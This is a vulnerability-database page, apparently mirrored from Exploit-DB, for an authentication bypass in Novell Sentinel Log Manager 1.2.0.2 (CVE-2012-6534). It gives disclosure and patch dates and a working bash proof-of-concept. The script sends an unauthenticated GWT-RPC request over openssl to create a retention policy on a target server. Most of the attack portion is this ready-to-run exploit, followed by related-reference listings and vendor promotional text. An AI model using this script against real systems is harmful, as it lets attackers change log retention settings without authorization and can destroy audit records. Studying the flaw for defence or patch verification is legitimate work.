Lucene search
+L

Novell Sentinel Log Manager 1.2.0.2 - Retention Policy

🗓️ 04 Oct 2012 00:00:00Reported by Piotr ChmylkowskiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Novell Sentinel Log Manager v1.2.0.2 allows unauthenticated users to configure retention policies. Patch released on 2012/09/21

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2012-6534
29 Mar 201310:00
cve
cvelist
Cvelist
CVE-2012-6534
29 Mar 201310:00
cvelist
euvd
EUVD
EUVD-2012-6382
29 Mar 201310:00
euvd
nessus
Tenable Nessus
Novell Sentinel Log Manager Authentication Bypass
19 Nov 201200:00
nessus
nvd
NVD
CVE-2012-6534
29 Mar 201316:08
nvd
openvas
OpenVAS
Novell Sentinel Log Manager Retention Policy Security Bypass Vulnerability
23 Nov 201200:00
openvas
prion
Prion
Design/Logic Flaw
29 Mar 201316:08
prion
susecve
SUSE CVE
SUSE CVE-2012-6534
11 Apr 202509:54
susecve
Novell Sentinel Log Manager ver. <=1.2.0.2 allows unauthenticated
users configuring retention policies.

Vendor informed: 2012/09/06
Patch Released: 2012/09/21
PoC:

#!/bin/bash

TARGET=$1
PORT=8443

if [ $# -ne 1 ]; then
  echo "Usage: `basename $0` target"
  exit 1
fi

echo "POST /novelllogmanager/datastorageservice.rpc HTTP/1.1
Host: $TARGET:$PORT
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: whatever
X-GWT-Module-Base:
https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/
Content-Length: 385
Cookie: JSESSIONID=whatever
Pragma: no-cache
Cache-Control: no-cache
Connection: close

5|0|9|https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/|E377321CAAD2FABED6283BD3643E4289|com.novell.sentinel.scout.client.datastorage.SentinelDataStorageService|createRetentionPolicy|com.novell.sentinel.scout.client.datastorage.retention.RetentionPolicy/419393389|sev:[0
TO 5]|1|AAA|java.util.ArrayList/3821976829|1|2|3|4|1|5|5|0|0|0|6|1|7|7|8|0|0|9|0|


" | openssl s_client -quiet -connect $TARGET:$PORT

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.04486
34